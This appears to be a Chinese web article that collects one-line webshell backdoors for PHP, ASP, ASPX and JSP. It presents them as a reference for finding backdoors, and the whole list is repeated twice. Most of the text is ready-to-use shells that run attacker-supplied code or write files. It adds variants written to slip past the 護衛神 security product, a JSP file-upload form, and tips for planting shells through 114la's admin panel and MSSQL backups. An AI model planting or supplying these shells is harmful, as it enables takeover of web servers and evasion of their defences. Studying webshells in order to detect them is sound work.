整理的比較全的一句話后門代碼(方面大家查找后門)
更新時(shí)間:2010年09月05日 12:23:00 作者:
整理的比較全的一句話后門代碼(方面大家查找后門),很多情況下也會有一些特殊字符的表示,原理一樣。
最近一句話后門不斷升級大家注意防范,基本上多事字符替換
過護(hù)衛(wèi)神PHP一句話作者:小東
<?php $a = str_replace(x,”",”axsxxsxexrxxt”);
$a($_POST["c"]); ?>
測試成功,主要對付護(hù)衛(wèi)神,其他的也可以試試
dedecms5.7一句話后門
@eval(file_get_contents('php://input'));
asp一句話木馬
程序代碼
<%eval request("sb")%>
程序代碼
<%execute request("sb")%>
程序代碼
<%execute(request("sb"))%>
程序代碼
<%execute request("sb")%><%'<% loop <%:%>
程序代碼
<%'<% loop <%:%><%execute request("sb")%>
程序代碼
<%execute request("sb")'<% loop <%:%>[code]
[code]<script language=vbs runat=server>eval(request("sb"))</script>
程序代碼
%><%Eval(Request(chr(35)))%><%
程序代碼
<%eval request("sb")%>
程序代碼
<%ExecuteGlobal request("sb")%>
程序代碼
if Request("sb")<>"" then ExecuteGlobal request("sb") end if
//容錯(cuò)代碼
程序代碼
<%@LANGUAGE="JAVASCRIPT" CODEPAGE="65001"%>
<%
var lcx = {'名字' : Request.form('#'), '性別' : eval, '年齡' : '18', '昵稱' : '請叫我一聲老大'};
lcx.性別((lcx.名字)+'');
%>
//使用冰狐一句話客戶端鏈接
程序代碼
<%
Set o = Server.CreateObject("ScriptControl")
o.language = "vbscript"
o.addcode(Request("SubCode")) '參數(shù)SubCode作為過程代碼
o.run "e",Server,Response,Request,Application,Session,Error '參數(shù)名e 調(diào)用之,同時(shí)壓入6個(gè)基對象作為參數(shù)
%>
調(diào)用示例:
程序代碼
http://localhost/tmp.asp?SubCode=sub%20e%28Server,Response,Request,Application,Session,Error%29%20eval%28request%28%22v%22%29%29%20end%20sub&v=response.write%28server.mappath%28%22tmp.asp%22%29%29
php一句話
程序代碼
<?php eval($_POST[sb])?>
程序代碼
<?php @eval($_POST[sb])?>
//容錯(cuò)代碼
程序代碼
<?php assert($_POST[sb]);?>
//使用lanker一句話客戶端的專家模式執(zhí)行相關(guān)的php語句
程序代碼
<?$_POST['sa']($_POST['sb']);?>
程序代碼
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
程序代碼
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
//使用這個(gè)后,使用菜刀一句話客戶端在配置連接的時(shí)候在"配置"一欄輸入
程序代碼
<O>h=@eval($_POST[c]);</O>
程序代碼
<script language="php">@eval($_POST[sb])</script>
//繞過<?限制的一句話
JSP一句話
程序代碼
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>
提交客戶端
程序代碼
<form action="http://59.x.x.x:8080/scdc/bob.jsp?f=fuckjp.jsp" method="post">
<textarea name=t cols=120 rows=10 width=45>your code</textarea><BR><center><br>
<input type=submit value="提交">
</form>
ASPX一句話
程序代碼
<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
程序代碼
<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%>
//Jscript的asp.net一句話
程序代碼
<%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"]) ); }%>
//C#的asp.net一句話
程序代碼
<% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request("f")) ) %>
VB的asp.net一句話
第一:114la網(wǎng)址導(dǎo)航系統(tǒng)后臺getwebshell,最新版本,已經(jīng)禁止了直接輸入<?php這樣的代碼
所以可以試用<script language="php">...<script>來繞過
第二,使用菜刀的附加數(shù)據(jù)功能可以出現(xiàn)很多轉(zhuǎn)換.所以還是仔細(xì)閱讀下菜刀的readme.txt,上面的代碼來自LCX的博客
第三,使用mssql備份一句話的時(shí)候,特別是asp.net和jsp,因?yàn)榇a過長,所以,需要再代碼前面和后面多加空格等垃圾字符保證代碼完整性,這個(gè)跟備份bat到啟動(dòng)項(xiàng)一個(gè)原理.
過護(hù)衛(wèi)神PHP一句話作者:小東
復(fù)制代碼 代碼如下:
<?php $a = str_replace(x,”",”axsxxsxexrxxt”);
$a($_POST["c"]); ?>
測試成功,主要對付護(hù)衛(wèi)神,其他的也可以試試
dedecms5.7一句話后門
@eval(file_get_contents('php://input'));
asp一句話木馬
程序代碼
<%eval request("sb")%>
程序代碼
<%execute request("sb")%>
程序代碼
<%execute(request("sb"))%>
程序代碼
<%execute request("sb")%><%'<% loop <%:%>
程序代碼
<%'<% loop <%:%><%execute request("sb")%>
程序代碼
<%execute request("sb")'<% loop <%:%>[code]
[code]<script language=vbs runat=server>eval(request("sb"))</script>
程序代碼
%><%Eval(Request(chr(35)))%><%
程序代碼
<%eval request("sb")%>
程序代碼
<%ExecuteGlobal request("sb")%>
程序代碼
if Request("sb")<>"" then ExecuteGlobal request("sb") end if
//容錯(cuò)代碼
程序代碼
<%@LANGUAGE="JAVASCRIPT" CODEPAGE="65001"%>
<%
var lcx = {'名字' : Request.form('#'), '性別' : eval, '年齡' : '18', '昵稱' : '請叫我一聲老大'};
lcx.性別((lcx.名字)+'');
%>
//使用冰狐一句話客戶端鏈接
程序代碼
<%
Set o = Server.CreateObject("ScriptControl")
o.language = "vbscript"
o.addcode(Request("SubCode")) '參數(shù)SubCode作為過程代碼
o.run "e",Server,Response,Request,Application,Session,Error '參數(shù)名e 調(diào)用之,同時(shí)壓入6個(gè)基對象作為參數(shù)
%>
調(diào)用示例:
程序代碼
http://localhost/tmp.asp?SubCode=sub%20e%28Server,Response,Request,Application,Session,Error%29%20eval%28request%28%22v%22%29%29%20end%20sub&v=response.write%28server.mappath%28%22tmp.asp%22%29%29
php一句話
程序代碼
<?php eval($_POST[sb])?>
程序代碼
<?php @eval($_POST[sb])?>
//容錯(cuò)代碼
程序代碼
<?php assert($_POST[sb]);?>
//使用lanker一句話客戶端的專家模式執(zhí)行相關(guān)的php語句
程序代碼
<?$_POST['sa']($_POST['sb']);?>
程序代碼
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
程序代碼
<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>
//使用這個(gè)后,使用菜刀一句話客戶端在配置連接的時(shí)候在"配置"一欄輸入
程序代碼
<O>h=@eval($_POST[c]);</O>
程序代碼
<script language="php">@eval($_POST[sb])</script>
//繞過<?限制的一句話
JSP一句話
程序代碼
<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>
提交客戶端
程序代碼
<form action="http://59.x.x.x:8080/scdc/bob.jsp?f=fuckjp.jsp" method="post">
<textarea name=t cols=120 rows=10 width=45>your code</textarea><BR><center><br>
<input type=submit value="提交">
</form>
ASPX一句話
程序代碼
<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
程序代碼
<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%>
//Jscript的asp.net一句話
程序代碼
<%if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"]) ); }%>
//C#的asp.net一句話
程序代碼
<% If Request.Files.Count <> 0 Then Request.Files(0).SaveAs(Server.MapPath(Request("f")) ) %>
VB的asp.net一句話
第一:114la網(wǎng)址導(dǎo)航系統(tǒng)后臺getwebshell,最新版本,已經(jīng)禁止了直接輸入<?php這樣的代碼
所以可以試用<script language="php">...<script>來繞過
第二,使用菜刀的附加數(shù)據(jù)功能可以出現(xiàn)很多轉(zhuǎn)換.所以還是仔細(xì)閱讀下菜刀的readme.txt,上面的代碼來自LCX的博客
第三,使用mssql備份一句話的時(shí)候,特別是asp.net和jsp,因?yàn)榇a過長,所以,需要再代碼前面和后面多加空格等垃圾字符保證代碼完整性,這個(gè)跟備份bat到啟動(dòng)項(xiàng)一個(gè)原理.
相關(guān)文章
ol7.7安裝部署4節(jié)點(diǎn)spark3.0.0分布式集群的詳細(xì)教程
這篇文章主要介紹了安裝部署4節(jié)點(diǎn)spark3.0.0分布式集群,本文給大家介紹的非常詳細(xì),對大家的學(xué)習(xí)或工作具有一定的參考借鑒價(jià)值,需要的朋友可以參考下2020-07-07Typora?免費(fèi)版下載安裝入門使用教程(超簡單親測適用于Windows)
Typora是一款輕便簡潔的Markdown編輯器,支持即時(shí)渲染技術(shù),這也是與其他Markdown編輯器最顯著的區(qū)別,這篇文章主要介紹了Typora?免費(fèi)版下載安裝(超簡單親測適用于Windows)與入門,需要的朋友可以參考下2023-09-09詳解MD5算法的原理以及C#和JS的實(shí)現(xiàn)
MD5?是哈希算法(散列算法)的一種應(yīng)用。這篇文章主要和大家介紹一下MD5算法的原理以及C#和JS的實(shí)現(xiàn),文中的示例代碼講解詳細(xì),需要的可以參考一下2023-03-03Caffe圖像數(shù)據(jù)轉(zhuǎn)換成可運(yùn)行l(wèi)eveldb?lmdb文件
這篇文章主要為大家介紹了Caffe圖像數(shù)據(jù)轉(zhuǎn)換成可運(yùn)行l(wèi)eveldb?lmdb文件教程,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進(jìn)步,早日升職加薪2022-06-06一文教你在現(xiàn)有Vue項(xiàng)目中嵌入Blazor項(xiàng)目
目前官方只提供了angular和react倆種示例,所以本教程將來講解如何在Vue的現(xiàn)有項(xiàng)目中嵌入使用Blazor項(xiàng)目。文中的方法講解詳細(xì),感興趣的小伙伴可以了解一下2023-01-01前端遇到302重定向問題處理方式及設(shè)置第三方Cookie研究
這篇文章主要給大家介紹了關(guān)于前端遇到302重定向問題處理方式及設(shè)置第三方Cookie研究的相關(guān)資料,文中通過圖文介紹的非常詳細(xì),對大家的學(xué)習(xí)或者工作具有一定的參考借鑒價(jià)值,需要的朋友可以參考下2023-10-10